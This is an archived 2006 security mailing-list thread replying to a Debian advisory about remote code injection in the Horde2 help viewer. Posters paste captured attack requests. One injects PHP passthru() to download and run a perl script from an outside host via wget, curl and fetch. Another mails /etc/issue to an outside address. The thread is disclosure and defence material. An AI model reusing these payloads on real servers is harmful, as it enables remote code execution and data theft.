[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <1145027688.17039.43.camel@Stargate.iatechconsulting.com>
Date: Fri Apr 14 16:07:04 2006
From: nodialtone at comcast.net (Byron Copeland)
Subject: [SECURITY] [DSA 1034-1] New horde2 packages
fixseveral vulnerabilities
Here's another attempt:
GET /horde//services/help/?show=about&module=;%22
.passthru(%22killall%20-9%20perl;cd%20%22.chr(47).%22tmp;wget%20http:%22.chr(47).%22%22.chr(47).
%22dary.6te.net%22.chr(47).%22h;curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22dary.6te.net%
22.chr(47).%22h;fetch%20http:%22.chr(47).%22%22.chr(47).%22dary.6te.net%22.chr(47).%22h;perl%20h
;rm%20-rf%20h*%22);'. HTTP/1.1" 404 77 "-" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows 98)"
:)
On Fri, 2006-04-14 at 10:49, <...> wrote:
> <from [funsec]>
> (thx Henderson, Dennis K.)
>
> Which web server would be a target for this GET?
>
> Not sure what group to post this to but I'm sure having fun watching the
> attempts..
>
> :)
>
>
>
>
> GET
> /horde2/services/help/?show=about&module=;%22.passthru(%22cat%20%22.chr(
> 47).%22etc%22.chr(47).%22issue%20%7Cmail%20-s%20ho2%20p0wd3r31337@...il.
> com%22);'. HTTP/1.1
> Accept: */*
> Accept-Language: en-us
> Accept-Encoding: gzip, deflate
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
> Host: x.x.x.x
> Connection: Close
>
> </from [funsec]>
>
> ----- Original Message -----
> From: "Moritz Muehlenhoff" <jmm@...ian.org>
> To: <debian-security-announce@...ts.debian.org>
> Sent: Friday, April 14, 2006 4:42 PM
> Subject: [Full-disclosure] [SECURITY] [DSA 1034-1] New horde2 packages
> fixseveral vulnerabilities
>
>
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> > - --------------------------------------------------------------------------
> > Debian Security Advisory DSA 1034-1 security@...ian.org
> > http://www.debian.org/security/ Moritz Muehlenhoff
> > April 14th, 2006 http://www.debian.org/security/faq
> > - --------------------------------------------------------------------------
> >
> > Package : horde2
> > Vulnerability : several
> > Problem-Type : remote
> > Debian-specific: no
> > CVE ID : CVE-2006-1260 CVE-2006-1491
> >
> > Several remote vulnerabilities have been discovered in the Horde web
> > application framework, which may lead to the execution of arbitrary
> > web script code. The Common Vulnerabilities and Exposures project
> > identifies the following problems:
> >
> > CVE-2006-1260
> >
> > Null characters in the URL parameter bypass a sanity check, which
> > allowed remote attackers to read arbitrary files, which allowed
> > information disclosure.
> >
> > CVE-2006-1491
> >
> > User input in the help viewer was passed unsanitised to the eval()
> > function, which allowed injection of arbitrary web code.
> >
> >
> > The old stable distribution (woody) doesn't contain horde2 packages.
> >
> > For the stable distribution (sarge) these problems have been fixed in
> > version 2.2.8-1sarge2.
> >
> > The unstable distribution (sid) does no longer contain horde2 packages.
> >
> > We recommend that you upgrade your horde2 package.
> >
> >
> > Upgrade Instructions
> > - --------------------
> >
> > wget url
> > will fetch the file for you
> > dpkg -i file.deb
> > will install the referenced file.
> >
> > If you are using the apt-get package manager, use the line for
> > sources.list as given below:
> >
> > apt-get update
> > will update the internal database
> > apt-get upgrade
> > will install corrected packages
> >
> > You may use an automated update by adding the resources from the
> > footer to the proper configuration.
> >
> >
> > Debian GNU/Linux 3.1 alias sarge
> > - --------------------------------
> >
> > Source archives:
> >
> >
> > http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8-1sarge2.dsc
> > Size/MD5 checksum: 575 acf3f1924f04e2faddfd06ba9b01820e
> >
> > http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8-1sarge2.diff.gz
> > Size/MD5 checksum: 39504 fb338c016b70e69fa4b867fa116b86dc
> >
> > http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8.orig.tar.gz
> > Size/MD5 checksum: 683005 89961af4e4488a908147d7b3a0dc3b44
> >
> > Architecture independent components:
> >
> >
> > http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8-1sarge2_all.deb
> > Size/MD5 checksum: 721398 35fa1bf8bf8b4f2be1076501b984367a
> >
> >
> > These files will probably be moved into the stable distribution on
> > its next update.
> >
> > - ---------------------------------------------------------------------------------
> > For apt-get: deb http://security.debian.org/ stable/updates main
> > For dpkg-ftp: ftp://security.debian.org/debian-security
> > dists/stable/updates/main
> > Mailing list: debian-security-announce@...ts.debian.org
> > Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
> > -----BEGIN PGP SIGNATURE-----
> > Version: GnuPG v1.4.3 (GNU/Linux)
> >
> > iD8DBQFEP7SJXm3vHE4uyloRAsVVAJ4n9UoO57tJYCw1JePujnjy90XFvACg3DLn
> > nrfwvObZjSThW+pXcD8NI38=
> > =BIdm
> > -----END PGP SIGNATURE-----
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists